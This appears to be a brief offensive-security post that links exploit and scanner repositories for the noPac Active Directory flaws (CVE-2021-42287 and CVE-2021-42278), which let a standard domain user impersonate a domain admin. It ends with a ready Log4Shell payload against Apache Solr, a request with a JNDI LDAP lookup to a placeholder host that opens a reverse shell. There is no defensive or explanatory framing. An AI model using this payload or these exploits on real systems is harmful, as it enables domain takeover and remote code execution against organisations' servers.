netrooter

CVE-2021-42287 / CVE-2021-42278: impersonate DA from standard domain user

Scanner and exploit in C # :
https://github.com/cube0x0/noPac

Python exploit for kali :
https://github.com/WazeHell/sam-the-admin

apache solr EXP #log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json